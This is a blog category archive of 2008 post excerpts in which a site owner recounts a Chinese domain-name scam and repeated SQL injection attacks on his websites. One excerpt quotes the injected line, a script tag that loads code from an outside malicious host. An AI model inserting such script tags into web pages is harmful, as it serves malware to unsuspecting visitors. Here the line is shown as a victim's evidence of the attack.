From the category archives:

Spam And Hacking

Chinese Domain Name Fraud

by rumblepup on November 27, 2008

Oh deary me.  Seems I’m the latest one to get hit with the china domain name scam.  Haven’t heard of it?  Oh, this is a cool one.  You don’t have to take my word for it, it’s been going on all over the place.
You see, this nice domain name registrar company in China has [...]

{ 6 comments }

F-OFF mr sql injection hacker

by rumblepup on June 9, 2008

Well, after we implemented our fix, mr. sql injecting hacker has been shown the door.  Today we where attacked three more times, both in the url and it seems in our open form fields, and as I’m apt to say when I do a beat down, FUACATA.
Bye bye sql injection hacker.

{ 0 comments }

SQL injection attack. Found the code being used.

by rumblepup on June 6, 2008

Ok, the latest state of sql injection attacks have been a nightmare. We got hacked again, but this time, with a insertion at the url level. These are a little easier to track. In the server logs, we found the following code in different formats.

Code was messing up my layout.  check out the [...]

{ 0 comments }

Latest info on SQL injection attack.

by rumblepup on June 5, 2008

I’ve been getting a lot of requests for information about how to patch this attack.  I’ve got to back up a minute and tell you that the attack is a pure sql injection attack.  Previously, I reported that it was a windows vulnerability, however, upon further investigation, the server logs I looked at where only [...]

{ 4 comments }

The xiaobaishan bomb is now the flyzhu.9966 bomb.

by rumblepup on June 4, 2008

Updated from: The xiaobaishan bomb.
Ok, when I posted about the xiaobaishan bomb, apparently the site this little hackermuffin was using went blammo, so he picked a new one. We where hacked againg, this the script calling:
<script src=http://flyzhu.9966.org/us/Help.asp></script>
Tricky little fucker.
In fact, this hack is pretty well thought out. Like I said on a previous [...]

{ 9 comments }

The xiaobaishan bomb. Thousands of sites hacked.

by rumblepup on June 1, 2008

It’s very rare that I get the inside scoop on a bomb hack, but this this time I’m one of the victims. Seems that some kind of sql injection hack has been leveled against thousands of websites. I’m calling it, for lack of a better term, the xiaobaishan bomb.
As I’m checking for [...]

{ 7 comments }